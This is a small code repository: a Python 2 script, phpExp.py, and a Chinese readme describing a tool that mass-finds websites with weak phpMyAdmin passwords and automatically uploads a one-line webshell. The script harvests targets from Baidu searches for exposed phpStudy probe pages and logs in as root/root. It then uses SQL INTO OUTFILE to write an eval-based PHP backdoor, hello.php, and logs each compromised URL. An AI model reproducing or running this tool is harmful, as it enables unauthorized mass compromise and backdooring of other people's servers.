├── phpExp.py
└── readme.txt


/phpExp.py:
--------------------------------------------------------------------------------
  1 | # coding=utf-8
  2 | import urllib2
  3 | import string
  4 | import urllib
  5 | import re
  6 | import cookielib 
  7 | import sys
  8 | import socket
  9 | 
 10 | def get_res_list_and_next_page_url(target_url):
 11 |     res = urllib2.urlopen(target_url)
 12 |     html=res.read()
 13 |     content = unicode(html, 'utf-8','ignore')
 14 |     pattern = re.compile(r'<div class="f13">(.*?)</span>')
 15 |     resList = pattern.findall(html)
 16 |     res_lists = resList
 17 | 
 18 |     #获取next_page_url
 19 |     pattern = re.compile(r'<div id="page".*?</div>')
 20 |     m = pattern.search(html)
 21 |     next_page_url = ''
 22 |     if m:
 23 |         t = m.group()
 24 |         pattern = re.compile(r'</strong><a href="(.*?)">')
 25 |         mm = pattern.search(t)
 26 |         tt = mm.group(1)
 27 |         next_page_url = 'http://www.baidu.com'+tt
 28 |     return res_lists,next_page_url
 29 | 
 30 | def get_url(div_data):
 31 |     pattern = re.compile(r'<span class="g">(.*?)&nbsp;')
 32 |     mm = pattern.search(div_data)
 33 |     if mm:
 34 |         url = mm.group(1)
 35 |         return url
 36 | 
 37 | if __name__ == "__main__":
 38 |     #初始化
 39 |     keyword = "phpStudy%20探针%202014"
 40 |     url = 'http://www.baidu.com/s?wd=' + keyword + '&rsv_bp=0&rsv_spt=3&rsv_n=2&inputT=6391'
 41 |     target_urls = []
 42 |     target_urls.append(url)
 43 | 
 44 |     page_num = 50 #想多少页就多少页。。只要你有。。
 45 | 
 46 |     for cnt in range(page_num):
 47 |         if target_urls[cnt] == "END_FLAG":
 48 |             break
 49 |         res_lists,next_page_url = get_res_list_and_next_page_url(target_urls[cnt])
 50 |         if next_page_url: #考虑没有“下一页”的情况
 51 |             target_urls.append(next_page_url)
 52 |         else:
 53 |             target_urls.append("END_FLAG")
 54 | 
 55 |         urls = []
 56 |   
 57 |         for index in range(len(res_lists)):
 58 |             socket.setdefaulttimeout(20)
 59 |             url = get_url(res_lists[index])
 60 |             urls.append(url)
 61 |             print url
 62 | 
 63 |             try:
 64 |                 php_page = urllib2.urlopen("http://"+url)
 65 |                 php_html=php_page.read()
 66 |                 path_search = re.compile(r'<td>绝对路径</td>[\s\S]*?<td>(.*?)</td>')
 67 |                 path_group = path_search.search(php_html)
 68 |                 if path_group:            
 69 |                     path = path_group.group(1)
 70 |             except:
 71 |                 print "Something is wrong"
 72 |                 continue
 73 | 
 74 |             cookies = cookielib.LWPCookieJar()
 75 |             opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookies)) 
 76 |             headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
 77 |             params = urllib.urlencode({'pma_username': 'root', 'pma_password': 'root'})
 78 |             request = urllib2.Request("http://"+url+"phpmyadmin/index.php", params,headers)
 79 |             try:
 80 |                 response = opener.open(request)
 81 |             except:
 82 |                 print "Something is wrong!"
 83 |                 continue
 84 |             if response:
 85 |                 a=response.read()
 86 |                 pattern = re.compile(r'<p>phpMyAdmin is more friendly with a')
 87 |                 judge = pattern.search(a)
 88 |                 if judge != None:
 89 |                     token_find = re.compile(r"token = '(.*?)';")
 90 |                     token_group = token_find.search(a)
 91 |                     token = token_group.group(1)
 92 |                     
 93 |                     f_u=file("url_OK.txt","a+")
 94 |                     f_u.write(url)
 95 |                     f_u.write("\r\n")
 96 |                     f_u.close()
 97 | 
 98 |                     if path:
 99 |                         path = path+'/hello.php'
100 |                         sql = ["Drop TABLE IF EXISTS xbclub;","Create TABLE xbclub(cmd text NOT NULL);","Insert INTO xbclub (cmd) VALUES('<?php @eval($_POST[123])?>');","Select cmd from xbclub into outfile '"+path+"';","Drop TABLE IF EXISTS xbclub;"]
101 |                         exp_headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
102 |                         success_num = 0
103 |                         for sql_cmd in sql:
104 |                             exp = urllib.urlencode({'is_js_confirmed':'1', 'db':'test', 'token':token, 'sql_query':sql_cmd,'ajax_request':'true'})
105 |                             exp_request = urllib2.Request("http://"+url+"phpmyadmin/import.php", exp, exp_headers)
106 |                             try:
107 |                                 exp_response = opener.open(exp_request)
108 |                             except:
109 |                                 print "Something is wrong!"
110 |                                 continue
111 |                         
112 |                         try:
113 |                             f_g=file("shell_might.txt","a+")
114 |                             f_g.write(url)
115 |                             f_g.write("\r\n")
116 |                             f_g.close()
117 |                             res = urllib2.urlopen('http://'+url+'hello.php')
118 |                         except urllib2.HTTPError,e:
119 |                             if e.code==404:
120 |                                 print "write Eror!"
121 |                                 continue
122 |                         f=file("shell.txt","a+")
123 |                         f.write(url+'hello.php')
124 |                         f.write("\r\n")
125 |                         f.close()
126 | 


--------------------------------------------------------------------------------
/readme.txt:
--------------------------------------------------------------------------------
1 | 利用PHP探针批量查找phpmyadmin若密码的网站并自动化上传一句话
2 | 


--------------------------------------------------------------------------------